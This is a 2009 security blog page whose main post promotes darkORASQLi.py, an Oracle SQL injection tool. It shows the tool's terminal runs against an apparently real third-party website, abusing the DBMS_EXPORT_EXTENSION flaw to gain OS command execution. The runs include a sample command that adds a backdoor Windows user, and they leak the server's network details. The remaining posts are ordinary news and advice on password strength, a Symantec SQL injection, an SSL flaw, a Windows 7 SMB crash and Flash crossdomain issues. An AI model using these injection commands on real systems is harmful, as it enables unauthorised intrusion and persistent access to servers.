Sunday, November 29, 2009

Multi Purpose Oracle SQL Injection Tool with darkORASQLi.py

After successfully developed POSTGRESQL injection tool,darkc0de will release new tool for Oracle SQL injection. If you ever heard about darkMYSQLi, darkMSSQLi, or darkPGSQLi, i think this tool is useful for you all especially penetration testers or security consultants. This tool 80% working and will be released later.


angryleopard:darkc0de d3ck4$ python darkORASQLi.py -u "https://[somevulnsite]/detail.jsp?id=1001039735'" --pwn
|-------------------------------------------------|
| d3ck4, hacking.expose@gmail.com v1.0 |
| |
| 05/2009 darkORASQLi.py |
| -- Multi Purpose Oracle SQL Injection Tool -- |
| Usage: darkORASQLi.py [options] |
| -h help hackingexpose.blogspot.com |
| |
| credit: rsauron, d3hydr8 [at] www.darkc0de.com |
|-------------------------------------------------|

[+] URL: https://[somevulnsite]/detail.jsp?id=1001039735'
[+] 10:47:52
[+] Evasion: + --
[+] Cookie: None
[+] SSL: Yes
[+] Agent: Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)
[-] Proxy Not Given
[+] Gathering Oracle Server Configuration...

Database: [censored].WORLD
User: [censored]
Version: Oracle Database 10g Enterprise Edition Release 10.2.0.1.0 - 64bi

[+] This mode is taking advantage of DBMS_EXPORT_EXTENSION vulnerability to run OS command
[+] Sending our ^EVIL^ payloads:

[+] Stage 1: Creating Java Library [ OK ]
[+] Stage 2: Granting Java Execute Privileges [ OK ]
[+] Stage 3: Creating Function for Command Execution [ OK ]
[+] Stage 3: Making Function Executable by All Users [ OK ]

[+] If all OK you should now can exec command with --cmd option
[+] Example:

[+] Windows
[+] --cmd "cmd.exe /c net user d3ck4 d4rkc0d3rz /add"

[+] UNIX/Linux
[+] --cmd "/bin/uname -a"




--cmd "/bin/uname -a"

angryleopard:darkc0de d3ck4$ python darkORASQLi.py -u "https://[censored]/detail.jsp?id=1001039735'" --cmd "/bin/uname -a"

|-------------------------------------------------|
| d3ck4, hacking.expose@gmail.com v1.0 |
| |
| 05/2009 darkORASQLi.py |
| -- Multi Purpose Oracle SQL Injection Tool -- |
| Usage: darkORASQLi.py [options] |
| -h help hackingexpose.blogspot.com |
| |
| credit: rsauron, d3hydr8 [at] www.darkc0de.com |
|-------------------------------------------------|

[+] URL: https://[censored]/detail.jsp?id=1001039735'
[+] 10:46:54
[+] Evasion: + --
[+] Cookie: None
[+] SSL: Yes
[+] Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)
[-] Proxy Not Given
[+] Gathering Oracle Server Configuration...

Database: [censored]
User: [censored]
Version: Oracle Database 10g Enterprise Edition Release 10.2.0.1.0 - 64bi

[+] Do we have Access to Oracle Database: NO

[-] Oracle user:password enumeration has been skipped!
[-] We do not have access to Oracle DB on this target!

[+] Executing OS command from the server
[+] Number of Command Lines: 1

$ /bin/uname -a
Linux asahan 2.6.9-22.ELsmp #1 SMP Mon Sep 19 18:00:54 EDT 2005 x86_64 x86_64 x86_64 GNU/Linux

[-] 10:46:55
[-] Total URL Requests: 5
[-] Done

Don't forget to check darkORASQLi.log




--cmd "/sbin/ifconfig"


angryleopard:darkc0de d3ck4$ python darkORASQLi.py -u "https://[censored]/detail.jsp?id=1001039735'" --cmd "/sbin/ifconfig"

|-------------------------------------------------|
| d3ck4, hacking.expose@gmail.com v1.0 |
| |
| 05/2009 darkORASQLi.py |
| -- Multi Purpose Oracle SQL Injection Tool -- |
| Usage: darkORASQLi.py [options] |
| -h help hackingexpose.blogspot.com |
| |
| credit: rsauron, d3hydr8 [at] www.darkc0de.com |
|-------------------------------------------------|

[+] URL: https://[censored]/detail.jsp?id=1001039735'
[+] 10:33:57
[+] Evasion: + --
[+] Cookie: None
[+] SSL: Yes
[+] Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)
[-] Proxy Not Given
[+] Gathering Oracle Server Configuration...

Database: [censored]
User: [censored]
Version: Oracle Database 10g Enterprise Edition Release 10.2.0.1.0 - 64bi

[+] Do we have Access to Oracle Database: NO

[-] Oracle user:password enumeration has been skipped!
[-] We do not have access to Oracle DB on this target!

[+] Executing OS command from the server
[+] Number of Command Lines: 1

$ /sbin/ifconfig
eth0 Link encap:Ethernet HWaddr 00:11:25:C4:DD:DC
inet addr:10.100.88.31 Bcast:10.100.88.255 Mask:255.255.255.0
inet6 addr: 2001:e68:2000:6458:211:25ff:fec4:dddc/64 Scope:Global
inet6 addr: fe80::211:25ff:fec4:dddc/64 Scope:Link
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:351166911 errors:0 dropped:0 overruns:0 frame:0
TX packets:393842969 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:63516816827 (59.1 GiB) TX bytes:231324821682 (215.4 GiB)
Interrupt:201

eth1 Link encap:Ethernet HWaddr 00:11:25:C4:DD:DD
inet6 addr: fe80::211:25ff:fec4:dddd/64 Scope:Link
UP BROADCAST MULTICAST MTU:1500 Metric:1
RX packets:0 errors:0 dropped:0 overruns:0 frame:0
TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:0 (0.0 b) TX bytes:0 (0.0 b)
Interrupt:209

lo Link encap:Local Loopback
inet addr:127.0.0.1 Mask:255.0.0.0
inet6 addr: ::1/128 Scope:Host
UP LOOPBACK RUNNING MTU:16436 Metric:1
RX packets:948943 errors:0 dropped:0 overruns:0 frame:0
TX packets:948943 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:0
RX bytes:93467115 (89.1 MiB) TX bytes:93467115 (89.1 MiB)

[-] 10:34:04
[-] Total URL Requests: 5
[-] Done

Don't forget to check darkORASQLi.log

20% to go.. till then, keep r0x darkc0de!

Strong Password

To protect your computer, your data and your online accounts, you should have a strong password. If your password is weak, you make it easier for someone to break in. Hackers make their livelihood by automating ways to continually search out the weakest link to gain access to a network or computer.

Please read this link for Password Security Awareness:
http://www.microsoft.com/protect/fraud/passwords/create.aspx


http://www.utexas.edu/its/secure/articles/keep_safe_with_strong_passwords.php



To check the strength of your password, you can use Password Checker:
http://www.microsoft.com/protect/fraud/passwords/checker.aspx

Symantec Online Store Hacked

A self-proclaimed grey-hat hacker has located a critical SQL injection vulnerability in a website belonging to security giant Symantec. The flaw can be leveraged to extract a wealth of information from the database including customer and admin login credentials, product serial numbers, and possibly credit card information.

The flaw was found by a Romanian hacker going by the online handle of Unu, according to whom an insecure parameter of a script from the pcd.symantec.com website, allows for a blind SQL injection (SQLi) attack to be performed. In such an attack, the hacker obtains read and/or write permission to the underlying database of the vulnerable website.

During a regular SQLi attack, the result of a rogue SQL query is displayed inside the browser instead of the normal web page output. Meanwhile, in a blind SQL injection, the query executes, but the website continues to display normally, making it much more difficult to extract information.

Please read here for more details:
http://news.softpedia.com/news/Symantec-Online-Store-Hacked-127726.shtml

Friday, November 13, 2009

Opinion: Can the SSL vulnerability hurt you?

ComputerWorld Security:

The security blogosphere is agog over some recently published vulnerability information describing attacks against the venerable SSL protocol -- you know, the one that almost the entire Internet relies on for securing transactions as they transit the Net. But how does this impact you? Let's try to separate the wheat from the chaff.

Let's start by looking at the vulnerability itself. It is a "man-in-the-middle" (MitM) attack in which an attacker can use an SSL feature called "negotiation" to inject bad stuff into an SSL session. Right, so that's not good news. But the sky isn't exactly falling yet, so we can all remain calm for now. Let's put things into perspective here.

Yes, by all accounts, there seems to be a serious weakness in SSL. As of right now, however, that weakness is known to a relatively small collection of folks who are working to come up with some solutions to the problem. That said, the technical details of the problem have been published, and there's little doubt that attacks will begin to surface over time.

More info, please read here.

Windows 7 / Server 2008R2 Remote Kernel Crash

This bug is a real proof that SDL #FAIL
The bug trigger an infinite loop on smb{1,2}, pre-auth, no credential needed...
Can be trigered outside the lan via (IE*)
The bug is so noob, it should have been spotted 2 years ago by the SDL if the SDL had ever existed:
See: http://g-laurent.blogspot.com/2009/11/windows-7-server-2008r2-remote-kernel.html

Saturday, November 07, 2009

Facebook and Myspace bolt Flash backdoors

Web developer Yvo Schaap has discovered that Facebook and Myspace have been being overgenerous in assigning privileges for Flash applications, allowing Schaap's Flash application to access another user's entire Facebook data.

Flash applications are only normally able to access resources on the server from which they have been loaded. In order to allow developers to design applications with more flexibility, Abode has, however, introduced the option of explicitly granting access to other servers. This is achieved by means of the crossdomain.xml file in a web server's root folder. Facebook had used this to grant the right to access the main domain to trusted sites via instructions such as:

More information:
http://www.h-online.com/security/news/item/Facebook-and-Myspace-bolt-Flash-backdoors-852318.html